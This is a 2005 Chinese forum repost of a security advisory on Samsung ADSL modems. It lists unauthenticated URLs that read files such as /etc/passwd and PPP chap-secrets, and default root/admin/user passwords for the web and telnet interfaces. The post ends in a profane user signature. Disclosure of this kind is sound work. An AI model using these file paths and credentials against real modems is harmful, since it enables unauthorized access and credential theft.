‹‹ 上一主题 | 下一主题 ››
发新话题
打印

[转载]Samsung ADSL Modem Vulnerability

EvilOctal

团队执行官

Rank: 8Rank: 8

E.S.T社区执行帐号

帖子
9861 
精华
771 
积分
40900 
阅读权限
200 
性别
男 
在线时间
3984 小时 
注册时间
2004-7-4 
最后登录
2008-11-18 
楼主 发表于 2005-3-22 23:51  只看该作者

[转载]Samsung ADSL Modem Vulnerability

  信息来源:morning_wood_at_zone-h.org

Samgsung Eletronics
http://www.samsung.com

DETAILS
=======
1. Arbitrary reading of files
2. Default root password
3. root file system access

Known issues exist in Boa httpd as per:
FreeBSD-SA-00:60 Security Advisory

http://www.securiteam.com/unixfocus/6G0081P0AI.html and
http://lists.insecure.org/lists/bugtraq/2000/Oct/0445.html

note:
This is a hardware based product with built in httpd for
remote access, this is a seperate issue than the ones
formaly presented above, but carry the same implications.

Identification:
HTTP/1.0 400 Bad Request
Date: Sat, 03 Jan 1970 17:57:18 GMT
Server: Boa/0.93.15
Connection: close
Content-Type: text/html

Modem vendor Samsung Electronics (co) modem
co chipset vendor b500545354430002
cpe chipset vendor Samsung Electronics (co) cpe chipset
software version SMDK8947v1.2 Jul 11 2003 10:00:01
ADSL DMT version a-110.030620-10130710

Samsung ADSL modems run uClinux OS
http://www.uclinux.com

note:
Depending on the implimentation, other products
using a combination of Boa / uClinux may be
affected as well.

Item 1
=====
http://[someSamsung.ip]/etc/passwd
http://[someSamsung.ip]/etc/hosts
http://[someSamsung.ip]/bin/
http://[someSamsung.ip]/dev/
http://[someSamsung.ip]/lib/
http://[someSamsung.ip]/tmp/

http://[someSamsung.ip]/var/ppp/chap-secrets

http://[someSamsung.ip]/bin/sh

Any remote user may request any file present
in the router/modem OS file system.
Files can be fetched unauthenticated via a
GET request in a browser.

Item 2
=====
Default user login / passwords exist in both
httpd ( http://[host]/cgi-bin/adsl.cgi) and telnet ports

root/root
admin/admin
user/user

Item 3
======
By telneting to the device and loging in as
root/root, remote users my access the filesystem.
The modem provides 256mb of ram for OS and
file system operations. In this implimentation
there is aprox 120mb free file system space
which allows for the posibility for remote
attackers to use the file system for malicious
communication and file storage. This allows
many scenarios such as a storing worm and/or
viral code.

#echo "some bad data" >file

SOLUTION:
=========
none to date
Samsung has been contacted
No patch released

Credits
=======
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs
Donnie Werner
mail: morning_wood_at_zone-h.org
曾几何时,有人对我说:装B遭雷劈。我说:去你妈的。于是,这个人又对我说:如果再说脏话,上帝会惩罚你的。我说:我操上帝。结论:彪悍的人生不需要上帝。

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题